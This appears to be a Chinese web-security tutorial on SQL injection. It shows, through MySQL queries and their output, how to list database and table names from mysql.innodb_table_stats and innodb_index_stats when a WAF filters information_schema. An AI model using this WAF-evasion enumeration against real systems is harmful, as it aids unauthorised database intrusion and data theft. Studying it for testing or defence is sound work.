0x00 概要
0x01 mysql 5.7之前库名与表名获取
- 0x01.1 mysql库名获取
- 0x01.2 mysql表名获取
0x02 mysql 5.7之后库名与表名获取方法一
- 0x02.1 mysql库名获取
- 0x02.2 mysql表名获取
0x03 mysql 5.7之后库名与表名获取方法二
- 0x03.1 mysql库名获取
- 0x03.2 mysql表名获取

0x00 概要

MySQL 5.7之后的版本，在其自带的 mysql 库中，新增了 innodb_table_stats 和 innodb_index_stats 这两张日志表。

如果数据表的引擎是 innodb ，则会在这两张表中记录表、键的信息。

如果waf过滤掉了 information_schema库我们可以利用新加的这两个表注入出数据库名和表名。

0x01 mysql 5.7之前库名与表名获取

0x01.1 mysql库名获取

5.7之前我们获取各个库的库名的话，执行的sql一般是。

SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata;

mysql> SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata;
+---------------------------------+
| concat(0x7e,schema_name,0x7e)   |
+---------------------------------+
| ~information_schema~            |
| ~JewelBoxService~               |
| ~Mamba_Blog~                    |
| ~Marketing-Activities-MServer~  |
| ~QM-WechatServer~               |
| ~ai_test~                       |
| ~career_talent_mserver~         |
| ~homestead~                     |
| ~icbc~                          |
| ~icbc_careertalent_inrice_test~ |
| ~icbc_quiz~                     |
| ~lottery.inrice.cn~             |
| ~message~                       |
| ~moell_blog~                    |
| ~mysql~                         |
| ~performance_schema~            |
| ~quiz_server~                   |
| ~quiz_test~                     |
| ~sys~                           |
| ~test~                          |
| ~testsss~                       |
| ~voice.inrice.test~             |
+---------------------------------+
22 rows in set

0x01.2 mysql表名获取

# 当前连接数据库
mysql> select database();
+------------+
| database() |
+------------+
| test       |
+------------+
1 row in set

SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database();

# test数据库所有表名
mysql> SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database();
+------------------------------+
| concat(0x7e,table_name,0x7e) |
+------------------------------+
| ~migrations~                 |
| ~sms_accounts~               |
| ~system_configs~             |
| ~templete_message_tokens~    |
| ~users~                      |
+------------------------------+
5 rows in set

0x02 mysql 5.7之后库名与表名获取方法一

0x02.1 mysql库名获取

select distinct concat(0x7e,database_name,0x7e) from mysql.innodb_table_stats;

mysql> select distinct concat(0x7e,database_name,0x7e) from mysql.innodb_table_stats;
+---------------------------------+
| concat(0x7e,database_name,0x7e) |
+---------------------------------+
| ~JewelBoxService~               |
| ~Mamba_Blog~                    |
| ~Marketing-Activities-MServer~  |
| ~QM-WechatServer~               |
| ~ai_test~                       |
| ~career_talent_mserver~         |
| ~icbc~                          |
| ~icbc_careertalent_inrice_test~ |
| ~icbc_quiz~                     |
| ~lottery.inrice.cn~             |
| ~message~                       |
| ~moell_blog~                    |
| ~mysql~                         |
| ~quiz_server~                   |
| ~quiz_test~                     |
| ~sys~                           |
| ~test~                          |
| ~testsss~                       |
| ~voice.inrice.test~             |
+---------------------------------+
19 rows in set

0x02.2 mysql表名获取

# 当前连接数据库
mysql> select database();
+------------+
| database() |
+------------+
| test       |
+------------+
1 row in set

select distinct concat(0x7e,table_name,0x7e) from mysql.innodb_table_stats where database_name=database();

mysql> select distinct concat(0x7e,table_name,0x7e) from mysql.innodb_table_stats where database_name=database();
+------------------------------+
| concat(0x7e,table_name,0x7e) |
+------------------------------+
| ~migrations~                 |
| ~sms_accounts~               |
| ~system_configs~             |
| ~templete_message_tokens~    |
| ~users~                      |
+------------------------------+
5 rows in set

0x03 mysql 5.7之后库名与表名获取方法二

0x03.1 mysql库名获取

SELECT distinct concat(0x7e,database_name,0x7e) from mysql.innodb_index_stats;

mysql> SELECT distinct concat(0x7e,database_name,0x7e) from mysql.innodb_index_stats;
+---------------------------------+
| concat(0x7e,database_name,0x7e) |
+---------------------------------+
| ~JewelBoxService~               |
| ~Mamba_Blog~                    |
| ~Marketing-Activities-MServer~  |
| ~QM-WechatServer~               |
| ~ai_test~                       |
| ~career_talent_mserver~         |
| ~icbc~                          |
| ~icbc_careertalent_inrice_test~ |
| ~icbc_quiz~                     |
| ~lottery.inrice.cn~             |
| ~message~                       |
| ~moell_blog~                    |
| ~mysql~                         |
| ~quiz_server~                   |
| ~quiz_test~                     |
| ~sys~                           |
| ~test~                          |
| ~testsss~                       |
| ~voice.inrice.test~             |
+---------------------------------+
19 rows in set

0x03.2 mysql表名获取

# 当前连接数据库
mysql> select database();
+------------+
| database() |
+------------+
| test       |
+------------+
1 row in set

SELECT distinct concat(0x7e,table_name,0x7e) from mysql.innodb_index_stats where database_name=database();

mysql> SELECT distinct concat(0x7e,table_name,0x7e) from mysql.innodb_index_stats where database_name=database();
+------------------------------+
| concat(0x7e,table_name,0x7e) |
+------------------------------+
| ~migrations~                 |
| ~sms_accounts~               |
| ~system_configs~             |
| ~templete_message_tokens~    |
| ~users~                      |
+------------------------------+
5 rows in set

Web 安全-数据验证不当

MySQL 5.7之后版本新增的一些对注入友好的特性